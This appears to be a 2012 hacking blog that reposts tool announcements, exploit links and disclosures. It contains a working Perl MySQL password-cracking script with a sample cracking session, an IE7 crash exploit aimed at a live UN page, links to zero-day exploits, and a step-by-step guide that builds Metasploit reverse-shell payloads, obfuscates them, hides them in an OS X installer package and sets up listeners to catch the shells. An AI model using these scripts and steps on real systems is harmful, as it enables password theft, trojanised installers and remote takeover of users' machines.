Dec 7, 2012

jSQL Injection - Java based automated SQL injection tool

An easy-to-use SQL injection tool to retrieve database information from a remote server.
jSQL Injection features:
  • GET, POST, header, cookie methods
  • normal, error based, blind, time based algorithms
  • automatic best algorithms detection
  • data retrieving progression
  • proxy setting
  • evasion
  • for now supports MySQL
Download the java executable here, or access the source code for programmers in the Google Git repository. Current tools used for development: w7 eclipse easyphp notepad++ egit.
Next work: speed increase (100% faster, literally), more blind testing, automatic code testing (JUnit) 

Source: http://www.breakthesecurity.com/2012/11/jsqli-sql-injection-tool.html



Dec 6, 2012

Hyperfox: transparently hijacking/proxying HTTP and HTTPS traffic

Installation

Before installing, make sure you have a working Go environment and git.
Check that your PATH and GOPATH variables are correctly set in your .bashrc, .zshrc or .profile file.
$ cat .zshrc
# ... stuff ...
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
And that pkg, src and bin exist.
$ mkdir -p $GOPATH/src
$ mkdir -p $GOPATH/bin
$ mkdir -p $GOPATH/pkg
Now attempt to install.
% go get github.com/xiam/hyperfox
% hyperfox -h

Usage example

Run hyperfox, it will start in HTTP mode listening at 0.0.0.0:9999 by default.
% hyperfox
If you want to analyze HTTPs instead of HTTP, use the -s flag and provide appropriate cert.pem and key.pem files.
% hyperfox -s -c ssl/cert.pem -k ssl/key.pem
hyperfox won’t be of much use if the host machine has no traffic to analyze or if the only traffic to analyze is its own.

Source: http://reventlov.com/projects/hyperfox
 

DoS vulnerabilities in Internet Explorer 7 (access violation)



-------------------------
Affected products:
-------------------------

Vulnerable are Internet Explorer 7 (7.00.5730.13) and other versions of IE7.
IE6 and IE8 are not affected.

----------
Details:
----------

DoS:

When a redirector with response 301, 302 or 303 and a data: URI in the Location
header is included in a frame or iframe tag, the browser crashes (the attack
doesn't work with other 30x statuses). It happens due to an access violation
(aka segmentation fault) in iexplore.exe.

Exploit:

http://websecurity.com.ua/uploads/2012/IE7%20DoS.txt

This is a 302 redirector in Perl. You can make similar redirectors with 301,
302 or 303 statuses.

As a 301 redirector you can use my example with a data: URI at TinyURL:

http://tinyurl.com/fj4hm

The attack works from the second attempt, so you need to go to the redirector
twice (set the URL twice in the address bar, or after the error page appears
return to the previous page in the browser).

Example of an attack with this redirector via the vulnerability
(http://websecurity.com.ua/4526/) at the United Nations' site (they haven't
fixed it since 29.04.2010, when I found this hole and informed the UN, so you
can use it for checking purposes):

http://www.un.org/zh/documents/view_doc.asp?url=http://tinyurl.com/fj4hm
 
Source:  http://seclists.org/fulldisclosure/2012/Dec/85


Dec 5, 2012

Interesting Exploit in 2012-12-05[Apache Tomcat]

Apache Tomcat 6.x / 7.x Denial Of Service 
http://packetstormsecurity.org/files/118615

Apache Tomcat Security Bypass
http://packetstormsecurity.org/files/118616

Apache Tomcat CSRF Prevention Filter Bypass 
http://packetstormsecurity.org/files/118617



Dec 4, 2012

MySQL Local/Remote FAST Account Password Cracking By Kingcope

The attacker logs into the MySQL server with an unprivileged account. There is a command in MySQL called change_user; as the name suggests, it can be used to change the user during a MySQL session. Since MySQL does this very fast, it is much more powerful for cracking passwords than reconnecting to the server on every attempt (which would be VERY slow). Since the SALT does not change in the change_user command (and this is the weak point), it is a convenient way to crack passwords. (When connecting to MySQL, the SALT is different on each connection attempt and is sent out by the server.)
 
use Net::MySQL;

$|=1;

my $mysql = Net::MySQL->new(
  hostname => '192.168.2.3',
  database => 'test',
  user     => "user",
  password => "secret",
  debug    => 0,
);

$crackuser = "crackme";

while(<STDIN>) {
  chomp;
  $currentpass = $_;

  $vv = join "\0",
    $crackuser,
    "\x14".
    Net::MySQL::Password->scramble(
      $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
    ) . "\0";
  if ($mysql->_execute_command("\x11", $vv) ne undef) {
    print "[*] Cracked! --> $currentpass\n";
    exit;
  }
}
---
example session:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
 
Source: http://seclists.org/fulldisclosure/2012/Dec/58 



Interesting Exploit in 2012-12-04 [Oracle, Web Application]

Oracle MySQL Privilege Escalation 
http://packetstormsecurity.org/files/118552

vBulletin 3.x <= 4.2.0 FAQ (Echo config) bug
http://1337day.com/exploit/19862 

Oracle MySQL 5.5.19-log Denial Of Service
http://packetstormsecurity.org/files/118553

Oracle MySQL Windows Stuxnet Technique SYSTEM Exploit 
http://packetstormsecurity.org/files/118554

Oracle MySQL User Account Enumeration Utility 
http://packetstormsecurity.org/files/118555

RIM BlackBerry PlayBook OS 1.0.8.6067 Local File Access Vulnerability 
http://1337day.com/exploit/19870

vBulletin 4.2.0 Full Path Disclosure Vulnerability
http://1337day.com/exploits/19874

Wordpress 3.4.2 Full Path Disclosure Vulnerability
http://1337day.com/exploits/19876

  
 

 


Dec 2, 2012

Interesting Exploit 2012-12-02 [MySQL]

MySQL (Linux) Heap Based Overrun PoC Zeroday 

http://1337day.com/exploit/19850

MySQL Denial of Service Zeroday PoC

http://1337day.com/exploit/19851

MySQL (Linux) Database Privilege Elevation Zeroday Exploit

http://1337day.com/exploit/19852

MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)

http://1337day.com/exploit/19853

MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday

http://1337day.com/exploit/19854

MySQL Remote Preauth User Enumeration Zeroday

http://1337day.com/exploit/19857

SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

http://1337day.com/exploit/19858

MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

http://1337day.com/exploit/19859





Dec 1, 2012

Howto: Web shell in JSP,ASP,PHP By BruteLogic.




Hacking OSX using Metasploit

This post is just a summary from the Source. If you want the whole thing, with pictures of each step, go to the Source.

1. Create backdoor file with Metasploit
- ./msfpayload   osx/x86/shell_reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R | ./msfencode -e x86/call4_dword_xor  > test.c
2.  Replacing the + at the end of file.
- sed -e 's/+/ /g' test.c > clean.c
- sed -e 's/buf = /unsigned char micro[]=/g' clean.c > ready.c
- echo "#include <stdio.h>" >> temp.c
- cat ready.c >> temp.c
- echo ";" >> temp.c
- echo "int main(void) { ((void (*)())micro)();" >> temp.c
- echo "}" >> temp.c
- mv temp.c final.c
- echo "final.c is ready in ShellCode, please compile it usig gcc on OSX"
- rm -f clean.c
- rm -f test.c
- rm -f ready.c
- rm -f rand.c
- rm -f temp2
- rm -f temp3
- rm -f temp4

3. Compile it with gcc
- gcc final.c -o OSXBin

4. Generate a Java meterpreter JAR file.
- ./msfpayload   java/meterpreter/reverse_tcp  LHOST=$IP LPORT=$port EXITFUNC=thread R  > test.jar


5. Obfuscate the JAR file with ProGuard (http://proguard.sourceforge.net/).

6. Create a PKG file with Iceberg and edit install.sh similar to this:
#!/bin/sh
/Applications/Utilities/OSXBin &
 
7. Set up a listener for the shell
./msfcli exploit/multi/handler  PAYLOAD=osx/x86/shell_reverse_tcp   LHOST=192.168.168.100 LPORT=80  E 


8. Set up a listener for the JAR
./msfcli exploit/multi/handler  PAYLOAD=java/meterpreter/reverse_tcp   LHOST=192.168.168.100 LPORT=81  E
 
9. Install the pkg and run the JAR
java -jar /Applications/Utilities/obfuscated.jar 
 
 

Source: http://astr0baby.wordpress.com/2012/11/30/hacking-osx-using-metasploit/ 
